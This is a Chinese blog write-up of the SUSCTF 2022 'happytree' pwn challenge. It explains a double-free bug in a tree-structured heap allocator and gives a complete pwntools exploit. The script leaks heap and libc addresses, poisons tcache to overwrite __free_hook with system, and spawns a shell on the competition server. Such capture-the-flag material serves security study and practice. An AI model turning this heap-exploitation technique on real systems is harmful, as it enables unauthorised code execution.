SUSCTF 2022 happytree

最新推荐文章于 2024-09-14 09:17:07 发布
最新推荐文章于 2024-09-14 09:17:07 发布
阅读量523 收藏
点赞数
分类专栏: PWN 文章标签: pwn 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483787/article/details/123174992
版权

首先要做的是理解程序的功能
三个功能,add,del和show
每次add,首先会申请一个0x20大小的chunk,用来存放控制信息
结构大概如此:
在这里插入图片描述
申请堆块时的控制堆通过左右孩子指针能够形成一个树型结构
有一个头结点指针存在bss中,然后每次申请会根据size大小来决定其控制堆在树上的位置

本题漏洞在于:
在这里插入图片描述
删除以及添加的时候没有清空控制堆内容,这就使得左右孩子指针会残留,而free的时候并没有对左右孩子指针进行任何检测,libc版本也是2.27,所以可以直接进行double free

大致的做题过程为,泄露libc,构造UAF进行double free,改fd为free_hook,将system写进free_hook,释放一个/bin/sh,就结束了

exp:

from re import L
from pwn import *
from ctypes import *
from string import *
from hashlib import *
from itertools import product
context.log_level = 'debug'
context.arch='amd64'
#io = process('./pwn',aslr=True)
io = remote('124.71.147.225',9999)
libc = ELF('./libc-2.27.so')
elf=ELF("./pwn")
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def menu(choice):
    sla("cmd> ",str(choice))
def add(size,context):
    menu(1)
    sla("data: ",str(size))
    sa("content: ",context)
def free(size):
    menu(2)
    sla("data: ",str(size))
def show(size):
    menu(3)
    sla("data: ",str(size))
for i in range(0x90,0x99):
    add(i,'a')
for i in range(0x98,0x8f,-1):
    free(i)
add(0x90,'a')
show(0x90)
ru('content: ')
heapbase=u64(io.recv(6).ljust(8,'\x00'))-0x12161
lg('heapbase')
add(0x91,'/bin/sh\x00')
for i in range(0x92,0x98):
    add(i,'a'*8)
add(0x40,'a')
add(0x30,'a')
free(0x40)
show(0x97)
ru('a'*8)
libcbase=u64(io.recv(6).ljust(8,'\x00'))-(0x7f6ab7473ca0-0x7f6ab7088000)
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
lg("libcbase")
#free(0x92)
free(0x96)
add(0x98,'a')
free(0x97)
heap=heapbase+0x11f40
heap=heap&0xffffffff
lg("heap")
free(heap)
add(0x96,p64(free_hook))
add(0x8a,'/bin/sh\x00')
free(0x30)
add(0x89,p64(system))
#gdb.attach(io)
free(0x91)
irt()
Ayakaaaa
关注
专栏目录
SUSCTF|WP:CrakeMe 一道android逆向
BadRer的博客
04-01 862
前言可能是第一次单字节手动爆flag开始这题是一个涉及到so动态调试的apk。我之前都是用红米note来进行动态调试的,因为android4.4感觉脱壳比较容易,但这次的版本要求为api 26也就是android8.0.这就有点蛋疼了,还好我自己用的手机够格,所以就拿自己手机上了。先是搭了一波环境,64位32位搞不清了都,ida附加了半天没附加上去,最后使用64位来调的。 check1函数的过
SUSCTF 2018 做题记录
0verWatch的博客
06-05 7134
前言 最近好久都没做题目,刚好上次搭的题目还在,就不要浪费了,记录记录做题过程吧 正文 minBash 这个题目考的点是沙盒绕过,第一次玩这个东西??反正进去之后尝试ls,cat,file等各种那个命令均无效果,都会显示 -rbash: ls: command not found 发现有一篇好文章,有空瞅瞅:http://cauc.me/2017/11/16/python沙盒绕...
SUSCTF2022WP
Pvr1sC的博客
02-28 856
出了一道Re,另一道是dart和flutter,干不动就这样了
SUSCTF2022 官方 Writeup 项目使用教程
gitblog_01047的博客
09-14 867
SUSCTF2022 官方 Writeup 项目使用教程 SUSCTF2022_official_wp SUSCTF2022 Official Writeup 项目地址: https://gitcode.com/gh_mirror...
SUSCTF2022 Misc
mumuzi的博客
03-01 2337
Misc就两个字 无语 文章目录Misccheckinra2TannermisoundAUDIOReDigitalCircuits Misc checkin ra2 下载下来是红警2,由于不是exe打开的,因此地图编辑器没用。打开游戏之后发现有个mission,是和 flag有关的,于是用notepad++全局搜一下mission里面的内容,找到ctf-01 其中发现规则是在ctf-01.lua当中,因为难度只有后两个,所以修改一下 然后发现白天只有30s,于是再修改成120s(事实上应该改贼大的一个数
SUSCTF 2022 Crypto复现
M3ng@L的博客
09-14 1492
AnalysisAnalysisAnalysis 简答来说,题目中函数生成了一个实数矩阵A\pmb{A}AA,并且大小为;由以单个字符构成的大小的矩阵X\pmb{X}XX;由矩阵乘法B=AX\pmb{B}=\pmb{A}\pmb{X}BB=AAXX,生成结果矩阵b\pmb{b}bb;已知量有实数矩阵A\pmb{A}AA,以及结果矩阵B\pmb{B}BB我们已知矩阵乘法中的一个乘数矩阵以及结果矩阵,那么可以计算X=AB\pmb{X}=\pmb{A} \pmb{B}XX=AABB,得到矩阵X\pmb{X}XX;
SUSCTF2022 tttree
sky123博客
03-12 2676
首先将 0x140010074 ,0x140017EFA ,140018C67 起始处的数据转换为汇编。 观察汇编,发现很多代码块之间相互跳转,因此先按照 retn 划分代码块。 代码块中存在大量类似 push rcx;pop rcx 的无用操作,将其去除后继续分析。 def simplify_asms(asms): left_asms = [] for asm in asms: if asm.startswith("pop") and len(left_asms)
SUSCTF2022 Writeup:Dest0g3 Team的Java挑战解析
作者Dest0g3分享了在SUSCTF2022比赛中遇到的一些挑战和解决方法,其中涉及到Java反序列化漏洞的利用。 首先,讨论的是一个名为"babygadgetv1.0"的Web题目。作者最初认为这可能是一个涉及Tomcat服务器和EL...
Dest0g3-Java部分1
08-03
在描述中提到了SUSCTF 2022网络安全竞赛中的一些解题策略,其中涉及到Java反序列化漏洞、EL(Expression Language)表达式绕过以及XXE(XML External Entity)攻击。 【Java反序列化漏洞】: 在描述中,团队首先...
unctf2019 pwn部分题解
NoOneGroup
01-08 1575
unctf2019 pwn部分题解 新博客链接 babyheap easy,不讲了 #!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * local = 1 host = '127.0.0.1' port = 10000 context.log_level = 'debug' exe = '/tmp/tmp.spk5n...
[susctf2022-pwn] 02-happytree
weixin_52640415的博客
02-28 432
早晨才看到比赛,9点就结束。结束后作了一道题。 堆有漏洞大概有3个:UAF,写溢出,未初始化指针。其中未初始化指针是最难找了,一般想不到。不过也有个办法如果找不着前边两个就找后边这个。 题目有add,show,free三个函数。其中add有两个未初始化指针: __int64 __fastcall m1add(__int64 a1, __int64 a2, unsigned int a3) { __int64 v5; // [rsp+10h] [rbp-10h] v5 = a2; if
SUSCTF
weixin_44319142的博客
04-14 468
Crypto 哈夫曼树构造 根据flag格式试着去构造 11 000111 11 00010 000110 100 00001 01 11 101 01 11 101 0010 0010 101 11 01 101 01 11 0011 100 0011 0011 11 11 01 11 101 01 11 11 101 100 101 11 100 11 101 0010 01 11 01 1...
SUSCTF2022 官方 Writeup 使用教程
最新发布
gitblog_00269的博客
09-14 257
SUSCTF2022 官方 Writeup 使用教程 SUSCTF2022_official_wp SUSCTF2022 Official Writeup 项目地址: https://gitcode.com/gh_mirrors/...
SUSCTF 2022圆满落幕,SU战队夺冠
Cyberpeace的博客
03-02 7516
SUSCTF 2022圆满落幕,恭喜SU战队夺得冠军!
susctf-put
a3uRa的一个窝
06-05 384
put一个message postman base64解密即可
SUSCTF rain
sky123博客
03-03 764
分析代码 main void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { int num; // [rsp+14h] [rbp-Ch] int *info; // [rsp+18h] [rbp-8h] sub_401D2F(a1, a2, a3); while ( 1 ) { info = init_info(); while ( 1 ) { while ( 1 )
[SUSCTF]fxxkcors(CSRF提权)
Landasika的博客
05-17 357
首先注册登陆后发现 审计changepermission中的源码可以发现 这个地方需要我们提交一个usename的js表单进行用户提权, 根据题目的意思,我们需要提权之后才能看到flag。 首先用bp直接提交表单试试,结果发现这个地方需要admin的用户才能提权,那么我们需要进行CSRF让服务器给我们提权。 再分析report界面的js代码 const opt = { name...
2019SUSCTF安德门
OIqng的博客
08-02 315
读题 在南京地铁一号线运行途中,一个1在鼓楼上车,一个1在新街口上车。过了安德门站之后,只剩一个1了,为什么?flag提交格式SUSCTF{} 审题 and运算 提供 flag_a: SwsKu鐊~_??鈝ww? flag_b: [誗鉚F0t{Os遤輙_镹d} 解题 题目描述提示的是and门,也就是与运算。 文件需要用二进制读写,每个字节按位与就能得到flag。 python解法 f = open('flag.txt','rb') a = f.readline()[8:] b = f.read
SUSCTF 2022 rain
weixin_46483787的博客
02-28 592
首先理解程序的结构,三个功能,一个编辑config,一个打印config,一个rain,其中config用的是realloc来申请,realloc中的size参数,是你写入的config的大小-18 realloc存在UAF,当size为0,即输入的config大小恰为18的时候,realloc(ptr,0)的效果等同于free(0),所以只需要先利用realloc申请一个不在fastbin里的东西,然后free 8 次,再申请回来一次,就可以泄露libc 接下来利用realloc导致的double fre
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值